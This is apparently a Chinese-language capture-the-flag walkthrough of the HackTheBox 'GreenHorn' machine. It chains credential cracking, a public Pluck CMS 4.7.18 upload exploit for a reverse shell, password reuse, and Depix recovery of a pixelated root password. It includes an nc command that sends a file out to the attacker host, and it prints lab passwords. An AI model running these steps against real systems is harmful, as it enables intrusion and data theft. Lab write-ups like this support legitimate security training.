信息收集
nmap扫端口
访问80端口,会出现报错,在/etc/hosts写入greenhorn.htb
echo "10.10.11.25 greenhorn.htb" >> /etc/hosts
再次访问
识别指纹为pluck cms
github有对应poc,但缺少登录密码GitHub - Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC
访问3000端口,创建一个用户登录
在探索中查看到有库文件,在data/settings/pass.php为登录密码
解密得到登录密码为iloveyou1
访问80端口使用密码登录http://greenhorn.htb/login.php
使用poc中的shell文件(修改对应host和端口),创建zip包
本地监听端口
运行poc
我这里不知道什么原因,一直报错,选择手动上传文件,
在options -manage modules-install a module
上传shell.php压缩的zip文件
反弹回shell
使用python3 -c 'import pty;pty.spawn("/bin/bash")'补全命令
在home目录下查看用户
在查看junior目录下user.txt文件报错,判断用户权限不足,使用之前获得的登录密码尝试切换junior用户
查看user.txt,得到第一个flag
尝试进行suid提权,无可利用文件
注意到junior目录下有一个'Using OpenVAS.pdf',下到本机查看
靶机执行 nc 10.10.16.3 1234 < 'Using OpenVAS.pdf'
本机执行 nc -lvp 1234 > 'Using OpenVAS.pdf'
提示 执行sudo /user/sbin/openvas 但password被隐藏了,
用了 pdfimages 来将图片中的涂抹部分提取为 png,
然后使用 Depix 来恢复像素。Depix 链接:https://github.com/spipm/Depix
得到密码
sidefromsidetheothersidesidefromsidetheotherside
切换root 用户得到第二个flag